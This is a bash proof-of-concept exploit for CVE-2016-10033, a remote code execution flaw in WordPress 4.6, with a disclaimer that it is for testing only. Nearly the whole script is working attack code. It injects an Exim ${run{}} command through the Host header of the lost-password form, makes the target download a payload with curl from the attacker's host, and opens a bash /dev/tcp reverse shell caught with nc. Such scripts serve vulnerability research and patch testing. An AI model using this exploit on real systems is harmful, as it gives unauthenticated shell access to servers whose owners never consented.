WordPress 4.6 - Remote Code Execution (RCE) Exploit

1. #!/bin/bash
2. #
3. # __ __ __ __ __
4. # / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
5. # / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
6. # / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
7. # /_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
8. # /____/
9. #
10. #
11. # WordPress 4.6 - Remote Code Execution (RCE) PoC Exploit
12. # CVE-2016-10033
13. #
14. # wordpress-rce-exploit.sh (ver. 1.0)
15. #
16. #
17. # Discovered and coded by
18. #
19. # Dawid Golunski (@dawid_golunski)
20. # https://legalhackers.com
21. #
22. # ExploitBox project:
23. # https://ExploitBox.io
24. #
25. # Full advisory URL:
26. # https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html
27. #
28. # Exploit src URL:
29. # https://exploitbox.io/exploit/wordpress-rce-exploit.sh
30. #
31. #
32. # Tested on WordPress 4.6:
33. # https://github.com/WordPress/WordPress/archive/4.6.zip
34. #
35. # Usage:
36. # ./wordpress-rce-exploit.sh target-wordpress-url
37. #
38. #
39. # Disclaimer:
40. # For testing purposes only
41. #
42. #
43. # -----------------------------------------------------------------
44. #
45. # Interested in vulns/exploitation?
46. #
47. #
48. # .;lc'
49. # .,cdkkOOOko;.
50. # .,lxxkkkkOOOO000Ol'
51. # .':oxxxxxkkkkOOOO0000KK0x:'
52. # .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.
53. # ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.
54. # '';ldxxxxxdc,. ,oOXXXNNNXd;,.
55. # .ddc;,,:c;. ,c: .cxxc:;:ox:
56. # .dxxxxo, ., ,kMMM0:. ., .lxxxxx:
57. # .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:
58. # .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:
59. # .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:
60. # .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:
61. # .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:
62. # .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:
63. # .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:
64. # .dxxxxxdl;. ., .. .;cdxxxxxx:
65. # .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:
66. # .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.
67. # .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.
68. # .':oxxxxxxxxx.ckkkkkkkkxl,.
69. # .,cdxxxxx.ckkkkkxc.
70. # .':odx.ckxl,.
71. # .,.'.
72. #
73. # https://ExploitBox.io
74. #
75. # https://twitter.com/Exploit_Box
76. #
77. # -----------------------------------------------------------------
78.  
79.  
80.  
81. rev_host="192.168.57.1"
82.  
83. function prep_host_header() {
84. cmd="$1"
85. rce_cmd="\${run{$cmd}}";
86.  
87. # replace / with ${substr{0}{1}{$spool_directory}}
88. #sed 's^/^${substr{0}{1}{$spool_directory}}^g'
89. rce_cmd="`echo $rce_cmd | sed 's^/^\${substr{0}{1}{\$spool_directory}}^g'`"
90.  
91. # replace ' ' (space) with
92. #sed 's^ ^${substr{10}{1}{$tod_log}}$^g'
93. rce_cmd="`echo $rce_cmd | sed 's^ ^\${substr{10}{1}{\$tod_log}}^g'`"
94. #return "target(any -froot@localhost -be $rce_cmd null)"
95. host_header="target(any -froot@localhost -be $rce_cmd null)"
96. return 0
97. }
98.  
99.  
100. #cat exploitbox.ans
101. intro="
102. DQobWzBtIBtbMjFDG1sxOzM0bSAgICAuO2xjJw0KG1swbSAbWzIxQxtbMTszNG0uLGNka2tPT09r
103. bzsuDQobWzBtICAgX19fX19fXxtbOEMbWzE7MzRtLiwgG1swbV9fX19fX19fG1s1Q19fX19fX19f
104. G1s2Q19fX19fX18NCiAgIFwgIF9fXy9fIF9fX18gG1sxOzM0bScbWzBtX19fXBtbNkMvX19fX19c
105. G1s2Q19fX19fX19cXyAgIF8vXw0KICAgLyAgXy8gICBcXCAgIFwvICAgLyAgIF9fLxtbNUMvLyAg
106. IHwgIFxfX19fXy8vG1s3Q1wNCiAgL19fX19fX19fXz4+G1s2QzwgX18vICAvICAgIC8tXCBfX19f
107. IC8bWzVDXCBfX19fX19fLw0KIBtbMTFDPF9fXy9cX19fPiAgICAvX19fX19fX18vICAgIC9fX19f
108. X19fPg0KIBtbNkMbWzE7MzRtLmRkYzssLDpjOy4bWzlDG1swbSxjOhtbOUMbWzM0bS5jeHhjOjs6
109. b3g6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eG8sG1s1QxtbMG0uLCAgICxrTU1NMDouICAuLBtb
110. NUMbWzM0bS5seHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1QxtbMG1sVy4gb01N
111. TU1NTU1LICBkMBtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s1
112. QxtbMG0uMGsuLEtXTU1NV05vIDpYOhtbNUMbWzM0bS54eHh4eHg6DQobWzM3bSAbWzZDLhtbMTsz
113. NG1keHh4eHhjG1s2QxtbMG0ueE4weHh4eHh4eGtYSywbWzZDG1szNG0ueHh4eHh4Og0KG1szN20g
114. G1s2Qy4bWzE7MzRtZHh4eHh4YyAgICAbWzBtbGRkT01NTU1XZDBNTU1NS2RkZC4gICAbWzM0bS54
115. eHh4eHg6DQobWzM3bSAbWzZDG1sxOzM0bS5keHh4eHhjG1s2QxtbMG0uY05NTU1OLm9NTU1NeCcb
116. WzZDG1szNG0ueHh4eHh4Og0KG1szN20gG1s2QxtbMTszNG0uZHh4eHh4YxtbNUMbWzBtbEtvO2RO
117. TU4ub01NMDs6T2suICAgIBtbMzRtJ3h4eHh4eDoNChtbMzdtIBtbNkMbWzE7MzRtLmR4eHh4eGMg
118. ICAgG1swbTtNYyAgIC5seC46bywgICAgS2wgICAgG1szNG0neHh4eHh4Og0KG1szN20gG1s2Qxtb
119. MTszNG0uZHh4eHh4ZGw7LiAuLBtbMTVDG1swOzM0bS4uIC47Y2R4eHh4eHg6DQobWzM3bSAbWzZD
120. G1sxOzM0bS5keHh4eCAbWzBtX19fX19fX18bWzEwQ19fX18gIF9fX19fIBtbMzRteHh4eHg6DQob
121. WzM3bSAbWzdDG1sxOzM0bS4nOm94IBtbMG1cG1s2Qy9fIF9fX19fX19fXCAgIFwvICAgIC8gG1sz
122. NG14eGMsLg0KG1szN20gG1sxMUMbWzE7MzRtLiAbWzBtLxtbNUMvICBcXBtbOEM+G1s3QzwgIBtb
123. MzRteCwNChtbMzdtIBtbMTJDLxtbMTBDLyAgIHwgICAvICAgL1wgICAgXA0KIBtbMTJDXF9fX19f
124. X19fXzxfX19fX19fPF9fX18+IFxfX19fPg0KIBtbMjFDG1sxOzM0bS4nOm9keC4bWzA7MzRtY2t4
125. bCwuDQobWzM3bSAbWzI1QxtbMTszNG0uLC4bWzA7MzRtJy4NChtbMzdtIA0K"
126. intro2="
127. ICAgICAgICAgICAgICAgICAgIBtbNDRtfCBFeHBsb2l0Qm94LmlvIHwbWzBtCgobWzk0bSsgLS09
128. fBtbMG0gG1s5MW1Xb3JkcHJlc3MgQ29yZSAtIFVuYXV0aGVudGljYXRlZCBSQ0UgRXhwbG9pdBtb
129. MG0gIBtbOTRtfBtbMG0KG1s5NG0rIC0tPXwbWzBtICAgICAgICAgICAgICAgICAgICAgICAgICAg
130. ICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBtChtbOTRtKyAtLT18G1swbSAgICAgICAgICBE
131. aXNjb3ZlcmVkICYgQ29kZWQgQnkgICAgICAgICAgICAgICAgG1s5NG18G1swbQobWzk0bSsgLS09
132. fBtbMG0gICAgICAgICAgICAgICAbWzk0bURhd2lkIEdvbHVuc2tpG1swbSAgICAgICAgICAgICAg
133. ICAgIBtbOTRtfBtbMG0gChtbOTRtKyAtLT18G1swbSAgICAgICAgIBtbOTRtaHR0cHM6Ly9sZWdh
134. bGhhY2tlcnMuY29tG1swbSAgICAgICAgICAgICAgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBt
135. ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAbWzk0bXwbWzBt
136. ChtbOTRtKyAtLT18G1swbSAiV2l0aCBHcmVhdCBQb3dlciBDb21lcyBHcmVhdCBSZXNwb25zaWJp
137. bGl0eSIgG1s5NG18G1swbSAKG1s5NG0rIC0tPXwbWzBtICAgICAgICAqIEZvciB0ZXN0aW5nIHB1
138. cnBvc2VzIG9ubHkgKiAgICAgICAgICAbWzk0bXwbWzBtIAoKCg=="
139. echo "$intro" | base64 -d
140. echo "$intro2" | base64 -d
141.  
142. if [ "$#" -ne 1 ]; then
143. echo -e "Usage:\n$0 target-wordpress-url\n"
144. exit 1
145. fi
146. target="$1"
147. echo -ne "\e[91m[*]\033[0m"
148. read -p " Sure you want to get a shell on the target '$target' ? [y/N] " choice
149. echo
150.  
151.  
152. if [ "$choice" == "y" ]; then
153.  
154. echo -e "\e[92m[*]\033[0m Guess I can't argue with that... Let's get started...\n"
155. echo -e "\e[92m[+]\033[0m Connected to the target"
156.  
157. # Serve payload/bash script on :80
158. RCE_exec_cmd="(sleep 3s && nohup bash -i >/dev/tcp/$rev_host/1337 0<&1 2>&1) &"
159. echo "$RCE_exec_cmd" > rce.txt
160. python -mSimpleHTTPServer 80 2>/dev/null >&2 &
161. hpid=$!
162.  
163. # Save payload on the target in /tmp/rce
164. cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
165. prep_host_header "$cmd"
166. curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
167. echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
168.  
169. # Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
170. cmd="/bin/bash /tmp/rce"
171. prep_host_header "$cmd"
172. curl -H"Host: $host_header" -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword &
173. echo -e "\n\e[92m[+]\033[0m Payload executed!"
174.  
175. echo -e "\n\e[92m[*]\033[0m Waiting for the target to send us a \e[94mreverse shell\e[0m...\n"
176. nc -vv -l 1337
177. echo
178. else
179. echo -e "\e[92m[+]\033[0m Responsible choice ;) Exiting.\n"
180. exit 0
181.  
182. fi
183.  
184.  
185. echo "Exiting..."
186. exit 0